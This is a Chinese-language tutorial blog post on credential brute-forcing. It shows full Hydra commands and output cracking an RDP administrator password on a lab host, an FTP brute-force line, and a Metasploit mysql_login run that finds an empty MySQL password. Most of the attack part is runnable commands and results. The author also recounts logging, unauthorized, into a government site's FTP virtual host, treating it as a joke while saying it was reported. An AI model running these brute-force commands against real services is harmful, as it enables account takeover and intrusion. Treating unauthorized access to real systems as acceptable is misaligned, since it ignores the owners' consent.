淺談爆破在滲透測試中的重要性.
測試環境
Kali03主機爆破後台用戶名以及密碼的話 當然 windows下最好的爆破工具非burp莫屬 但是在linux下 有一塊特別好用的爆破工具 :hydra(九頭蛇)
最大的安全漏洞之一是密碼,每個密碼安全研究顯示。 Hydra是一個parallized登錄cracker,支持多種協議攻擊。新模塊很容易添加,除此之外,它是靈活和非常快。
Hydra在Linux,Windows / Cygwin,Solaris 11,FreeBSD 8.1和OSX上進行測試,並且通過特殊的OpenSSL許可證擴展在GPLv3下可用。目前此工具支持:AFP,Cisco AAA,Cisco auth,Cisco啟用,CVS,Firebird,FTP,HTTP-FORM-GET,HTTP-FORM-POST,HTTP-GET,HTTP-HEAD,HTTP-PROXY,HTTPS- FORM- GET,HTTPS- -POST,HTTPS-GET,HTTPS-HEAD,HTTP代理,ICQ,IMAP,IRC,LDAP,MS-SQL,MYSQL,NCP,NNTP,Oracle偵聽器,Oracle SID,Oracle,PC-Anywhere,PCNFS,POP3,POSTGRES ,RDP,Rexec,Rlogin,Rsh,SAP / R3,SIP,SMB,SMTP,SMTP Enum,SNMP,SOCKS5,SSH(v1和v2),Subversion,Teamspeak(TS2),Telnet,VMware-Auth,VNC和XMPP。
參數說明
root@xaiSec:~# hydra -helpnHydra v7.4.2(c)2012 by van Hauser / THC&David Maciejak - 僅供法律用途n n語法:hydra [[[-l LOGIN | -L FILE] [-p PASS | -P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]] | [service:// server [:PORT] [/ OPT]]n n選項:n -R恢復先前中止/崩潰的會話n -S執行SSL連接n -s PORT如果服務在不同的默認埠,請在此處定義n -l LOGIN或-L FILE使用LOGIN名稱登錄,或從FILE載入幾個登錄n -p PASS或-P FILE嘗試密碼PASS,或從FILE載入多個密碼n -x MIN:MAX:CHARSET password bruteforce generation,鍵入「-x -h」獲取幫助n -e nsr嘗試「n」空密碼,「s」登錄為pass和/或「r」反向登錄n -u環繞用戶,不是密碼(有效!隱含與-x)n -C FILE冒號分隔的「login:pass」格式,而不是-L / -P選項n -M FILE並行攻擊的伺服器列表,每行一個條目n -o FILE寫找到的登錄/密碼對到FILE而不是stdoutn -f / -F退出時,找到登錄/傳遞對(-M:-f每個主機,-F全局)n -t TASKS並行運行TASKS連接數(每個主機,默認值:16)n -w / -W響應的等待時間(32s)/每個線程連接之間n -4 / -6優選IPv4(默認)或IPv6地址n -v / -V / -d詳細模式/ show login + pass每個嘗試/調試模式n -U服務模塊使用詳細信息n 伺服器目標伺服器(使用此OR或-M選項)n 服務服務破解。支持的協議:afp cisco cisco-enable cvs firebird ftp ftps http [s] - {head | get} http [s] - {get | post} -form http-proxy http-proxy-urlenum icq imap [s] irc ldap2 [ s] ldap3 [ - {cram | digest} md5] [s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3 [s] postgres rdp rexec rlogin rsh sip smb smtp [s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet [s] vmauthd vnc xmppn OPT一些服務模塊支持附加輸入(-U用於模塊幫助)n對代理使用HYDRA_PROXY_HTTP / HYDRA_PROXY和HYDRA_PROXY_AUTH環境。n nHydra是一個工具,猜測/破解有效的登錄/密碼對 - 只允許使用n為法律目的。最新版本可在[url]http://www.thc.org/thc-hydra[/url]n以下服務未編譯:sapr3 oracle。n n例子:n hydra -l john -p doe 192.168.0.1 ftpn hydra -L user.txt -p defaultpw -S 192.168.0.1 imap PLAINn hydra -l admin -P pass.txt http-proxy://192.168.0.1n hydra -C defaults.txt -6 pop3s:// [fe80 :: 2c:31ff:fe12:ac11]:143 / DIGEST-MD5n
當然 我們先來嘗試下爆破伺服器
我們把192.168.0.128這台03主機當做伺服器
http://192.168.0.128/ 當做我們想滲透的網址
接著我們踩點 首先模擬 不知道這個網站的IP我們來ping一下 得知這個網站IP為192.168.0.128
接著我們來用Hydra來爆破一下
這裡我隨便弄了個Password 字典 把他放在了root目錄下 先來講一下 在知道用戶名是administrator的情況下 如何使用九頭蛇爆破
用戶名為 administrator
輸出結果如下
root@xaiSec:~# hydra 192.168.0.128 rdp -l administrator -P /root/pass -V nHydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes onlyn nHydra ([url]http://www.thc.org/thc-hydra[/url]) starting at 2017-03-19 21:54:27n[WARNING] rdp servers often dont like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recovern[DATA] 16 tasks, 1 server, 18 login tries (l:1/p:18), ~1 try per taskn[DATA] attacking service rdp on port 3389n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "admin" - 1 of 18 [child 0]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "111" - 2 of 18 [child 1]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "22" - 3 of 18 [child 2]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 4 of 18 [child 3]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 5 of 18 [child 4]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 6 of 18 [child 5]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 7 of 18 [child 6]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 8 of 18 [child 7]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 9 of 18 [child 8]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2222" - 10 of 18 [child 9]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "333333333333" - 11 of 18 [child 10]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "fhdf" - 12 of 18 [child 11]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jg" - 13 of 18 [child 12]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 14 of 18 [child 13]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 15 of 18 [child 14]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "ng" - 16 of 18 [child 15]n[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 16 of 18 [child 14]n[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "ng" - 16 of 18 [child 15]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "" - 17 of 20 [child 1]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "j" - 18 of 20 [child 11]n[3389][rdp] host: 192.168.0.128 login: administrator password: adminn1 of 1 target successfully completed, 1 valid password foundnHydra ([url]http://www.thc.org/thc-hydra[/url]) finished at 2017-03-19 21:54:32n
[3389][rdp] host: 192.168.0.128 login: administrator password: adminn
接著我們來說一下 參數問題
root@xaiSec:~# hydra 192.168.0.128 rdp -l administrator -P /root/pass -Vn
hydra IP 服務協議 -l 指定用戶名 -P 字典位置 -V 詳細信息
-L 大寫的話 後面我們要填上我們的username字典位置(在我們不知道username的情況下)列入hydra 192.168.0.128 rdp -L /root/user -P /root/pass -Vn
root@xaiSec:~# hydra 192.168.0.128 rdp -L /root/user -P /root/pass -VnHydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes onlyn nHydra ([url]http://www.thc.org/thc-hydra[/url]) starting at 2017-03-19 22:03:58n[WARNING] rdp servers often dont like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recovern[DATA] 16 tasks, 1 server, 234 login tries (l:13/p:18), ~14 tries per taskn[DATA] attacking service rdp on port 3389n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "admin" - 1 of 234 [child 0]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "111" - 2 of 234 [child 1]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "22" - 3 of 234 [child 2]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 4 of 234 [child 3]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 5 of 234 [child 4]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 6 of 234 [child 5]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 7 of 234 [child 6]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 8 of 234 [child 7]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 9 of 234 [child 8]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2222" - 10 of 234 [child 9]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "333333333333" - 11 of 234 [child 10]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "fhdf" - 12 of 234 [child 11]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jg" - 13 of 234 [child 12]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 14 of 234 [child 13]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 15 of 234 [child 14]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "ng" - 16 of 234 [child 15]n[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 16 of 234 [child 14]n[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "ng" - 16 of 234 [child 15]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "" - 17 of 235 [child 6]n[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "j" - 18 of 235 [child 3]n[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "" - 18 of 235 [child 6]n[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "admin" - 19 of 235 [child 7]n[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 20 of 235 [child 4]n[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "22" - 21 of 235 [child 5]n[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "j" - 21 of 235 [child 3]n[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "" - 21 of 235 [child 6]n[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 21 of 235 [child 4]n[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "admin" - 21 of 235 [child 7]n[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "22" - 21 of 235 [child 5]n[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "22" - 21 of 236 [child 5]n[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 22 of 238 [child 2]n[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 22 of 238 [child 2]n[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 23 of 239 [child 13]n[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 23 of 239 [child 13]n[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 24 of 240 [child 1]n[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 25 of 240 [child 12]n[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 25 of 240 [child 1]n[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 25 of 240 [child 12]n[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 26 of 242 [child 9]n[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 27 of 242 [child 11]n[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 27 of 242 [child 9]n[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 27 of 243 [child 11]n[3389][rdp] host: 192.168.0.128 login: administrator password: adminn[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2222" - 28 of 244 [child 0]n[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "333333333333" - 29 of 244 [child 8]n[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2222" - 29 of 244 [child 0]n[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "333333333333" - 29 of 245 [child 8]n[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "fhdf" - 30 of 246 [child 10]n[ATTEMPT] target 192.168.0.128 - login "fhfahreyrey" - pass "admin" - 37 of 246 [child 15]n[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "fhdf" - 37 of 247 [child 10]n[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "fhdf" - 37 of 247 [child 10]n[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "fhdf" - 37 of 247 [child 10]n[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 37 of 248 [child 4]n[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "admin" - 55 of 248 [child 3]n[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 55 of 249 [child 4]n[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 55 of 249 [child 4]n[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 55 of 249 [child 4]n[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "111" - 56 of 250 [child 4]n[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "22" - 57 of 251 [child 4]n[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 58 of 252 [child 4]n[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 59 of 253 [child 4]n[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 60 of 254 [child 4]n[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 61 of 255 [child 4]n[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 62 of 256 [child 4]n[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 63 of 257 [child 4]n[ERROR] Too many connect errors to target, disabling rdp://192.168.0.128:3389n0 of 1 target successfully completed, 1 valid password foundn[INFO] Writing restore file because 1 server scan could not be completedn[ERROR] 1 target was disabled because of too many errorsnHydra ([url]http://www.thc.org/thc-hydra[/url]) finished at 2017-03-19 22:04:04n
成功連接
爆破虛擬主機
hydra IP ftp -L /root/user -P /root/pass -Vn
這裡我拿一個gov的站做測試 噗嗤 已提交到漏洞盒子
我們可以看到 不管 什麼密碼 都能登錄 未授權就可以訪問虛擬主機 我們來登錄一下
當然 在Metasploit中 也有很多爆破模塊
爆破3306資料庫 我在我kali下已經搭建好了MySQL資料庫配置Metasploit
msf > use auxiliary/scanner/mysql/mysql_loginnmsf auxiliary(mysql_login) > set RHOSTS 127.0.0.1nRHOSTS => 127.0.0.1nmsf auxiliary(mysql_login) > set USERNAME testnUSERNAME => testnmsf auxiliary(mysql_login) > set PASS_FILE /root/passnPASS_FILE => /root/passnmsf auxiliary(mysql_login) > runn n[*] 127.0.0.1:3306 MYSQL - Found remote MySQL version 5.5.31n[*] 127.0.0.1:3306 MYSQL - [01/15] - Trying username:test with password:n[+] 127.0.0.1:3306 - SUCCESSFUL LOGIN test : n[*] Scanned 1 of 1 hosts (100% complete)n[*] Auxiliary module execution completednmsf auxiliary(mysql_login) >n
講解一下
use auxiliary/scanner/mysql/mysql_login //調用模塊nset RHOSTS 127.0.0.1 //設置資料庫地址 我本機的 當然是 127.0.0.1nset USERNAME test //我設置的MySQL資料庫用戶為test 當然 不知道的話 可以set USER_FILE 字典目錄 爆破nset PASS_FILE /root/pass //使用root/pass的字典 字典位置nrun 開始爆破n
[*] 127.0.0.1:3306 MYSQL - Found remote MySQL version 5.5.31n[*] 127.0.0.1:3306 MYSQL - [01/15] - Trying username:test with password:n[+] 127.0.0.1:3306 - SUCCESSFUL LOGIN test : n[*] Scanned 1 of 1 hosts (100% complete)n[*] Auxiliary module execution completedn
[+] 127.0.0.1:3306 - SUCCESSFUL LOGIN test : n
中 密碼為空
root@xaiSec:~# mysql -u test -pnEnter password:nWelcome to the MySQL monitor. Commands end with ; or g.nYour MySQL connection id is 54nServer version: 5.5.31-0+wheezy1 (Debian)n nCopyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.n nOracle is a registered trademark of Oracle Corporation and/or itsnaffiliates. Other names may be trademarks of their respectivenowners.n nType help; or h for help. Type c to clear the current input statement.n nmysql>n
因為沒有密碼 所以在輸入密碼的這裡 我們直接回車 就行了
我記得 有一個網站叫啥 caimima 利用人性的弱點 好像不能進了 咳咳。
當然 爆破配合社會工程學 會讓滲透測試人員如虎添翼.另外 小夥伴們 你們的伺服器密碼 是弱的嘛 如果是的話建議弄字母 數字 字元啥的 ~-- W3bSafe團隊成員 小愛_Joker
推薦閱讀:
※把炸彈敲碎了扔化糞池裡還會爆炸嗎?
※如何爆破角川本社?
※炸彈爆炸時把人炸飛是什麼原理?空氣這麼大力氣??
※如何看待武大教師節炸教學樓?
TAG:metasploit | 爆破 | 服务器 |